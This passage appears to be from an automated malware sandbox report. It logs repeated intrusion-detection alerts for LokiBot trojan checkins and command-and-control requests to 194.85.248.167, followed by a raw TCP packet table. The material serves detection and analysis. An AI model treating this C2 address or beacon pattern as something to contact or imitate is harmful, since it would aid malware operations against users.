                  11/25/21-18:22:47.475042TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976080192.168.2.3194.85.248.167
                  11/25/21-18:22:47.475042TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976080192.168.2.3194.85.248.167
                  11/25/21-18:22:47.475042TCP2025381ET TROJAN LokiBot Checkin4976080192.168.2.3194.85.248.167
                  11/25/21-18:22:47.475042TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976080192.168.2.3194.85.248.167
                  11/25/21-18:22:47.564037TCP2025483ET TROJAN LokiBot Fake 404 Response8049760194.85.248.167192.168.2.3
                  11/25/21-18:22:48.480656TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976180192.168.2.3194.85.248.167
                  11/25/21-18:22:48.480656TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976180192.168.2.3194.85.248.167
                  11/25/21-18:22:48.480656TCP2025381ET TROJAN LokiBot Checkin4976180192.168.2.3194.85.248.167
                  11/25/21-18:22:48.480656TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976180192.168.2.3194.85.248.167
                  11/25/21-18:22:48.579071TCP2025483ET TROJAN LokiBot Fake 404 Response8049761194.85.248.167192.168.2.3
                  11/25/21-18:22:51.071537TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976280192.168.2.3194.85.248.167
                  11/25/21-18:22:51.071537TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976280192.168.2.3194.85.248.167
                  11/25/21-18:22:51.071537TCP2025381ET TROJAN LokiBot Checkin4976280192.168.2.3194.85.248.167
                  11/25/21-18:22:51.071537TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976280192.168.2.3194.85.248.167
                  11/25/21-18:22:51.163780TCP2025483ET TROJAN LokiBot Fake 404 Response8049762194.85.248.167192.168.2.3
                  11/25/21-18:22:52.226443TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.3194.85.248.167
                  11/25/21-18:22:52.226443TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.3194.85.248.167
                  11/25/21-18:22:52.226443TCP2025381ET TROJAN LokiBot Checkin4976380192.168.2.3194.85.248.167
                  11/25/21-18:22:52.226443TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976380192.168.2.3194.85.248.167
                  11/25/21-18:22:52.969004TCP2025483ET TROJAN LokiBot Fake 404 Response8049763194.85.248.167192.168.2.3
                  11/25/21-18:22:54.348325TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.3194.85.248.167
                  11/25/21-18:22:54.348325TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.3194.85.248.167
                  11/25/21-18:22:54.348325TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.3194.85.248.167
                  11/25/21-18:22:54.348325TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976580192.168.2.3194.85.248.167
                  11/25/21-18:22:54.655710TCP2025483ET TROJAN LokiBot Fake 404 Response8049765194.85.248.167192.168.2.3
                  11/25/21-18:22:55.798213TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.3194.85.248.167
                  11/25/21-18:22:55.798213TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.3194.85.248.167
                  11/25/21-18:22:55.798213TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.3194.85.248.167
                  11/25/21-18:22:55.798213TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976680192.168.2.3194.85.248.167
                  11/25/21-18:22:56.114465TCP2025483ET TROJAN LokiBot Fake 404 Response8049766194.85.248.167192.168.2.3
                  11/25/21-18:22:58.836459TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.3194.85.248.167
                  11/25/21-18:22:58.836459TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.3194.85.248.167
                  11/25/21-18:22:58.836459TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.3194.85.248.167
                  11/25/21-18:22:58.836459TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976980192.168.2.3194.85.248.167
                  11/25/21-18:22:59.163004TCP2025483ET TROJAN LokiBot Fake 404 Response8049769194.85.248.167192.168.2.3
                  11/25/21-18:23:01.423938TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977080192.168.2.3194.85.248.167
                  11/25/21-18:23:01.423938TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.3194.85.248.167
                  11/25/21-18:23:01.423938TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.3194.85.248.167
                  11/25/21-18:23:01.423938TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977080192.168.2.3194.85.248.167
                  11/25/21-18:23:02.684122TCP2025483ET TROJAN LokiBot Fake 404 Response8049770194.85.248.167192.168.2.3
                  11/25/21-18:23:07.452292TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978580192.168.2.3194.85.248.167
                  11/25/21-18:23:07.452292TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978580192.168.2.3194.85.248.167
                  11/25/21-18:23:07.452292TCP2025381ET TROJAN LokiBot Checkin4978580192.168.2.3194.85.248.167
                  11/25/21-18:23:07.452292TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978580192.168.2.3194.85.248.167
                  11/25/21-18:23:07.544955TCP2025483ET TROJAN LokiBot Fake 404 Response8049785194.85.248.167192.168.2.3
                  11/25/21-18:23:09.396769TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980980192.168.2.3194.85.248.167
                  11/25/21-18:23:09.396769TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980980192.168.2.3194.85.248.167
                  11/25/21-18:23:09.396769TCP2025381ET TROJAN LokiBot Checkin4980980192.168.2.3194.85.248.167
                  11/25/21-18:23:09.396769TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980980192.168.2.3194.85.248.167
                  11/25/21-18:23:09.919206TCP2025483ET TROJAN LokiBot Fake 404 Response8049809194.85.248.167192.168.2.3
                  11/25/21-18:23:13.834390TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981380192.168.2.3194.85.248.167
                  11/25/21-18:23:13.834390TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981380192.168.2.3194.85.248.167
                  11/25/21-18:23:13.834390TCP2025381ET TROJAN LokiBot Checkin4981380192.168.2.3194.85.248.167
                  11/25/21-18:23:13.834390TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981380192.168.2.3194.85.248.167
                  11/25/21-18:23:13.931422TCP2025483ET TROJAN LokiBot Fake 404 Response8049813194.85.248.167192.168.2.3
                  11/25/21-18:23:19.463239TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981480192.168.2.3194.85.248.167
                  11/25/21-18:23:19.463239TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981480192.168.2.3194.85.248.167
                  11/25/21-18:23:19.463239TCP2025381ET TROJAN LokiBot Checkin4981480192.168.2.3194.85.248.167
                  11/25/21-18:23:19.463239TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981480192.168.2.3194.85.248.167
                  11/25/21-18:23:20.086960TCP2025483ET TROJAN LokiBot Fake 404 Response8049814194.85.248.167192.168.2.3
                  11/25/21-18:23:23.655365TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981780192.168.2.3194.85.248.167
                  11/25/21-18:23:23.655365TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.2.3194.85.248.167
                  11/25/21-18:23:23.655365TCP2025381ET TROJAN LokiBot Checkin4981780192.168.2.3194.85.248.167
                  11/25/21-18:23:23.655365TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981780192.168.2.3194.85.248.167
                  11/25/21-18:23:24.492060TCP2025483ET TROJAN LokiBot Fake 404 Response8049817194.85.248.167192.168.2.3
                  11/25/21-18:23:26.318058TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981880192.168.2.3194.85.248.167
                  11/25/21-18:23:26.318058TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981880192.168.2.3194.85.248.167
                  11/25/21-18:23:26.318058TCP2025381ET TROJAN LokiBot Checkin4981880192.168.2.3194.85.248.167
                  11/25/21-18:23:26.318058TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981880192.168.2.3194.85.248.167
                  11/25/21-18:23:26.435048TCP2025483ET TROJAN LokiBot Fake 404 Response8049818194.85.248.167192.168.2.3
                  11/25/21-18:23:27.828008TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981980192.168.2.3194.85.248.167
                  11/25/21-18:23:27.828008TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981980192.168.2.3194.85.248.167
                  11/25/21-18:23:27.828008TCP2025381ET TROJAN LokiBot Checkin4981980192.168.2.3194.85.248.167
                  11/25/21-18:23:27.828008TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981980192.168.2.3194.85.248.167
                  11/25/21-18:23:27.923948TCP2025483ET TROJAN LokiBot Fake 404 Response8049819194.85.248.167192.168.2.3
                  11/25/21-18:23:29.237002TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982080192.168.2.3194.85.248.167
                  11/25/21-18:23:29.237002TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982080192.168.2.3194.85.248.167
                  11/25/21-18:23:29.237002TCP2025381ET TROJAN LokiBot Checkin4982080192.168.2.3194.85.248.167
                  11/25/21-18:23:29.237002TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982080192.168.2.3194.85.248.167
                  11/25/21-18:23:29.329433TCP2025483ET TROJAN LokiBot Fake 404 Response8049820194.85.248.167192.168.2.3
                  11/25/21-18:23:30.587831TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982180192.168.2.3194.85.248.167
                  11/25/21-18:23:30.587831TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982180192.168.2.3194.85.248.167
                  11/25/21-18:23:30.587831TCP2025381ET TROJAN LokiBot Checkin4982180192.168.2.3194.85.248.167
                  11/25/21-18:23:30.587831TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982180192.168.2.3194.85.248.167
                  11/25/21-18:23:30.896799TCP2025483ET TROJAN LokiBot Fake 404 Response8049821194.85.248.167192.168.2.3
                  11/25/21-18:23:32.864603TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982280192.168.2.3194.85.248.167
                  11/25/21-18:23:32.864603TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982280192.168.2.3194.85.248.167
                  11/25/21-18:23:32.864603TCP2025381ET TROJAN LokiBot Checkin4982280192.168.2.3194.85.248.167
                  11/25/21-18:23:32.864603TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982280192.168.2.3194.85.248.167
                  11/25/21-18:23:32.960193TCP2025483ET TROJAN LokiBot Fake 404 Response8049822194.85.248.167192.168.2.3
                  11/25/21-18:23:35.140691TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982380192.168.2.3194.85.248.167
                  11/25/21-18:23:35.140691TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982380192.168.2.3194.85.248.167
                  11/25/21-18:23:35.140691TCP2025381ET TROJAN LokiBot Checkin4982380192.168.2.3194.85.248.167
                  11/25/21-18:23:35.140691TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982380192.168.2.3194.85.248.167
                  11/25/21-18:23:35.375536TCP2025483ET TROJAN LokiBot Fake 404 Response8049823194.85.248.167192.168.2.3
                  11/25/21-18:23:36.493113TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982580192.168.2.3194.85.248.167
                  11/25/21-18:23:36.493113TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982580192.168.2.3194.85.248.167
                  11/25/21-18:23:36.493113TCP2025381ET TROJAN LokiBot Checkin4982580192.168.2.3194.85.248.167
                  11/25/21-18:23:36.493113TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982580192.168.2.3194.85.248.167
                  11/25/21-18:23:37.014189TCP2025483ET TROJAN LokiBot Fake 404 Response8049825194.85.248.167192.168.2.3
                  11/25/21-18:23:40.295826TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982780192.168.2.3194.85.248.167
                  11/25/21-18:23:40.295826TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982780192.168.2.3194.85.248.167
                  11/25/21-18:23:40.295826TCP2025381ET TROJAN LokiBot Checkin4982780192.168.2.3194.85.248.167
                  11/25/21-18:23:40.295826TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982780192.168.2.3194.85.248.167
                  11/25/21-18:23:40.387692TCP2025483ET TROJAN LokiBot Fake 404 Response8049827194.85.248.167192.168.2.3
                  11/25/21-18:23:41.914761TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982980192.168.2.3194.85.248.167
                  11/25/21-18:23:41.914761TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982980192.168.2.3194.85.248.167
                  11/25/21-18:23:41.914761TCP2025381ET TROJAN LokiBot Checkin4982980192.168.2.3194.85.248.167
                  11/25/21-18:23:41.914761TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982980192.168.2.3194.85.248.167
                  11/25/21-18:23:42.233618TCP2025483ET TROJAN LokiBot Fake 404 Response8049829194.85.248.167192.168.2.3
                  11/25/21-18:23:44.612994TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983380192.168.2.3194.85.248.167
                  11/25/21-18:23:44.612994TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983380192.168.2.3194.85.248.167
                  11/25/21-18:23:44.612994TCP2025381ET TROJAN LokiBot Checkin4983380192.168.2.3194.85.248.167
                  11/25/21-18:23:44.612994TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983380192.168.2.3194.85.248.167
                  11/25/21-18:23:44.707285TCP2025483ET TROJAN LokiBot Fake 404 Response8049833194.85.248.167192.168.2.3
                  11/25/21-18:23:45.744734TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984580192.168.2.3194.85.248.167
                  11/25/21-18:23:45.744734TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984580192.168.2.3194.85.248.167
                  11/25/21-18:23:45.744734TCP2025381ET TROJAN LokiBot Checkin4984580192.168.2.3194.85.248.167
                  11/25/21-18:23:45.744734TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984580192.168.2.3194.85.248.167
                  11/25/21-18:23:45.839464TCP2025483ET TROJAN LokiBot Fake 404 Response8049845194.85.248.167192.168.2.3
                  11/25/21-18:23:46.879979TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985180192.168.2.3194.85.248.167
                  11/25/21-18:23:46.879979TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985180192.168.2.3194.85.248.167
                  11/25/21-18:23:46.879979TCP2025381ET TROJAN LokiBot Checkin4985180192.168.2.3194.85.248.167
                  11/25/21-18:23:46.879979TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985180192.168.2.3194.85.248.167
                  11/25/21-18:23:47.403833TCP2025483ET TROJAN LokiBot Fake 404 Response8049851194.85.248.167192.168.2.3
                  11/25/21-18:23:48.864530TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985580192.168.2.3194.85.248.167
                  11/25/21-18:23:48.864530TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985580192.168.2.3194.85.248.167
                  11/25/21-18:23:48.864530TCP2025381ET TROJAN LokiBot Checkin4985580192.168.2.3194.85.248.167
                  11/25/21-18:23:48.864530TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985580192.168.2.3194.85.248.167
                  11/25/21-18:23:48.959683TCP2025483ET TROJAN LokiBot Fake 404 Response8049855194.85.248.167192.168.2.3
                  11/25/21-18:23:51.197910TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985680192.168.2.3194.85.248.167
                  11/25/21-18:23:51.197910TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985680192.168.2.3194.85.248.167
                  11/25/21-18:23:51.197910TCP2025381ET TROJAN LokiBot Checkin4985680192.168.2.3194.85.248.167
                  11/25/21-18:23:51.197910TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985680192.168.2.3194.85.248.167
                  11/25/21-18:23:53.573219TCP2025483ET TROJAN LokiBot Fake 404 Response8049856194.85.248.167192.168.2.3
                  11/25/21-18:23:55.025972TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985780192.168.2.3194.85.248.167
                  11/25/21-18:23:55.025972TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985780192.168.2.3194.85.248.167
                  11/25/21-18:23:55.025972TCP2025381ET TROJAN LokiBot Checkin4985780192.168.2.3194.85.248.167
                  11/25/21-18:23:55.025972TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985780192.168.2.3194.85.248.167
                  11/25/21-18:23:55.525480TCP2025483ET TROJAN LokiBot Fake 404 Response8049857194.85.248.167192.168.2.3
                  11/25/21-18:23:56.479058TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985880192.168.2.3194.85.248.167
                  11/25/21-18:23:56.479058TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985880192.168.2.3194.85.248.167
                  11/25/21-18:23:56.479058TCP2025381ET TROJAN LokiBot Checkin4985880192.168.2.3194.85.248.167
                  11/25/21-18:23:56.479058TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985880192.168.2.3194.85.248.167
                  11/25/21-18:23:57.486293TCP2025483ET TROJAN LokiBot Fake 404 Response8049858194.85.248.167192.168.2.3
                  11/25/21-18:23:59.056904TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985980192.168.2.3194.85.248.167
                  11/25/21-18:23:59.056904TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985980192.168.2.3194.85.248.167
                  11/25/21-18:23:59.056904TCP2025381ET TROJAN LokiBot Checkin4985980192.168.2.3194.85.248.167
                  11/25/21-18:23:59.056904TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985980192.168.2.3194.85.248.167
                  11/25/21-18:23:59.210264TCP2025483ET TROJAN LokiBot Fake 404 Response8049859194.85.248.167192.168.2.3
                  11/25/21-18:24:00.760570TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986080192.168.2.3194.85.248.167
                  11/25/21-18:24:00.760570TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986080192.168.2.3194.85.248.167
                  11/25/21-18:24:00.760570TCP2025381ET TROJAN LokiBot Checkin4986080192.168.2.3194.85.248.167
                  11/25/21-18:24:00.760570TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986080192.168.2.3194.85.248.167
                  11/25/21-18:24:00.858030TCP2025483ET TROJAN LokiBot Fake 404 Response8049860194.85.248.167192.168.2.3
                  11/25/21-18:24:02.488226TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986180192.168.2.3194.85.248.167
                  11/25/21-18:24:02.488226TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986180192.168.2.3194.85.248.167
                  11/25/21-18:24:02.488226TCP2025381ET TROJAN LokiBot Checkin4986180192.168.2.3194.85.248.167
                  11/25/21-18:24:02.488226TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986180192.168.2.3194.85.248.167
                  11/25/21-18:24:02.585421TCP2025483ET TROJAN LokiBot Fake 404 Response8049861194.85.248.167192.168.2.3
                  11/25/21-18:24:04.158304TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986280192.168.2.3194.85.248.167
                  11/25/21-18:24:04.158304TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986280192.168.2.3194.85.248.167
                  11/25/21-18:24:04.158304TCP2025381ET TROJAN LokiBot Checkin4986280192.168.2.3194.85.248.167
                  11/25/21-18:24:04.158304TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986280192.168.2.3194.85.248.167
                  11/25/21-18:24:04.667956TCP2025483ET TROJAN LokiBot Fake 404 Response8049862194.85.248.167192.168.2.3
                  11/25/21-18:24:06.231426TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986380192.168.2.3194.85.248.167
                  11/25/21-18:24:06.231426TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986380192.168.2.3194.85.248.167
                  11/25/21-18:24:06.231426TCP2025381ET TROJAN LokiBot Checkin4986380192.168.2.3194.85.248.167
                  11/25/21-18:24:06.231426TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986380192.168.2.3194.85.248.167
                  11/25/21-18:24:06.343087TCP2025483ET TROJAN LokiBot Fake 404 Response8049863194.85.248.167192.168.2.3
                  11/25/21-18:24:07.945362TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986580192.168.2.3194.85.248.167
                  11/25/21-18:24:07.945362TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986580192.168.2.3194.85.248.167
                  11/25/21-18:24:07.945362TCP2025381ET TROJAN LokiBot Checkin4986580192.168.2.3194.85.248.167
                  11/25/21-18:24:07.945362TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986580192.168.2.3194.85.248.167
                  11/25/21-18:24:08.055054TCP2025483ET TROJAN LokiBot Fake 404 Response8049865194.85.248.167192.168.2.3
                  11/25/21-18:24:09.150416TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986680192.168.2.3194.85.248.167
                  11/25/21-18:24:09.150416TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986680192.168.2.3194.85.248.167
                  11/25/21-18:24:09.150416TCP2025381ET TROJAN LokiBot Checkin4986680192.168.2.3194.85.248.167
                  11/25/21-18:24:09.150416TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986680192.168.2.3194.85.248.167
                  11/25/21-18:24:09.249568TCP2025483ET TROJAN LokiBot Fake 404 Response8049866194.85.248.167192.168.2.3
                  11/25/21-18:24:11.256726TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986780192.168.2.3194.85.248.167
                  11/25/21-18:24:11.256726TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986780192.168.2.3194.85.248.167
                  11/25/21-18:24:11.256726TCP2025381ET TROJAN LokiBot Checkin4986780192.168.2.3194.85.248.167
                  11/25/21-18:24:11.256726TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986780192.168.2.3194.85.248.167
                  11/25/21-18:24:11.963359TCP2025483ET TROJAN LokiBot Fake 404 Response8049867194.85.248.167192.168.2.3

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Nov 25, 2021 18:22:15.623271942 CET4974480192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:15.654028893 CET8049744194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:15.654150009 CET4974480192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:15.658540010 CET4974480192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:15.688158989 CET8049744194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:15.688220978 CET4974480192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:15.717979908 CET8049744194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:15.769964933 CET8049744194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:15.770123959 CET4974480192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:15.868200064 CET8049744194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:15.868268013 CET4974480192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:17.612982035 CET8049744194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:17.613193035 CET4974480192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:17.613467932 CET4974480192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:17.640830040 CET8049744194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:18.805661917 CET4974580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:18.833978891 CET8049745194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:18.834136009 CET4974580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:18.837898016 CET4974580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:18.866069078 CET8049745194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:18.866183996 CET4974580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:18.894547939 CET8049745194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:20.563548088 CET8049745194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:20.563735962 CET4974580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:20.564021111 CET8049745194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:20.564080000 CET4974580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:20.603979111 CET8049745194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:21.618688107 CET4974680192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:21.646271944 CET8049746194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:21.646491051 CET4974680192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:21.772417068 CET4974680192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:21.799990892 CET8049746194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:21.800093889 CET4974680192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:21.827558994 CET8049746194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:21.949353933 CET8049746194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:21.949449062 CET8049746194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:21.949625015 CET4974680192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:21.949754953 CET4974680192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:21.977195024 CET8049746194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:23.348896980 CET4974780192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:23.376507998 CET8049747194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:23.376617908 CET4974780192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:23.379975080 CET4974780192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:23.408114910 CET8049747194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:23.408200026 CET4974780192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:23.435724020 CET8049747194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:23.474404097 CET8049747194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:23.474419117 CET8049747194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:23.474483013 CET4974780192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:23.474617958 CET4974780192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:23.778615952 CET4974780192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:23.806654930 CET8049747194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:25.256870031 CET4974880192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:25.288836956 CET8049748194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:25.289027929 CET4974880192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:25.292669058 CET4974880192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:25.557539940 CET4974880192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:25.585602999 CET8049748194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:25.843662024 CET8049748194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:25.843704939 CET8049748194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:25.844096899 CET4974880192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:25.846860886 CET4974880192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:25.874469995 CET8049748194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:26.837857008 CET4974980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:26.865418911 CET8049749194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:26.865601063 CET4974980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:26.868772030 CET4974980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:26.902103901 CET8049749194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:26.902323961 CET4974980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:26.929934978 CET8049749194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:26.965337992 CET8049749194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:26.965383053 CET8049749194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:26.965493917 CET4974980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:26.965606928 CET4974980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:26.993765116 CET8049749194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:28.223747015 CET4975080192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:28.251619101 CET8049750194.85.248.167192.168.2.3
                  Nov 25, 2021 18:22:28.251868010 CET4975080192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:28.257549047 CET4975080192.168.2.3194.85.248.167
                  Nov 25, 2021 18:22:28.287244081 CET8049750194.85.248.167192.168.2.3
